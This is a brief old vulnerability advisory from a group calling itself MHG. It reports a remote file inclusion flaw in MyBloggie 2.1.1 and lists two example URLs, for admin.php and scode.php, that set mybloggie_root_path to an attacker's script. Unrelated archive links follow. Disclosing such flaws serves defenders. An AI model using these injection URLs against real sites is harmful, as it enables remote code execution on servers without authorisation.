# MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit



# Milli-Harekat Advisory ( www.milli-harekat.org )

# MyBloggie <= 2.1.1 version - Remote File Include Vulnerabilities

# Risk : meduim

# Class: Remote

# Script : MyBloggie 2.1.1 version

# Msn : erne [at] ernealizm.com

# Credits : ERNE

# Thanks : Dj_ReMix,Eskobar,Blackened,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS

# Vulnerable :

http://www.site.com/blog/admin.php?mybloggie_root_path=[evil script]

http://www.site.com/blog/scode.php?mybloggie_root_path=[evil script]

_________________________________________________________________
Don?t just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/



Relevant Pages

  • ydtshortcut.js
    ... pc along with Earthlink, Compuserve, AOL, ... Yahoo, and MSN. ... JScript Script File ... Nothing comes up on Google, MSN, or HP's searches. ...
    (microsoft.public.windowsxp.newusers)
  • Re: WScript.exe - Application Error
    ... For the internet, like google or msn, it does not even ... E.g. your last post contains no fodder at all. ... Your last post is so kind, it will never catch anyone's attention, not even ... Also you mentioned that the script is ...
    (microsoft.public.scripting.wsh)
  • Re: form question
    ... Mike thanks for your reply I guess I mean IE here is the script:] ... > I don't understand "When I used it on firefox it worked, when I used it on msn". ... I wrote the script did not use the fp form creation thing it ...
    (microsoft.public.frontpage.programming)
  • setting up proxy for entire system using a script.
    ... How can I setup a proxy for entire system using a script. ... Itamar Reis Peixoto ... msn, google talk: itamar@xxxxxxxxxxxxxxxx ...
    (Fedora)
  • [Full-disclosure] Vuln ....
    ... Script:- PHP rojekt5.1.1 ... Code Vuln:- ... Be the first to hear what's new at MSN - sign up to our free newsletters! ...
    (Full-Disclosure)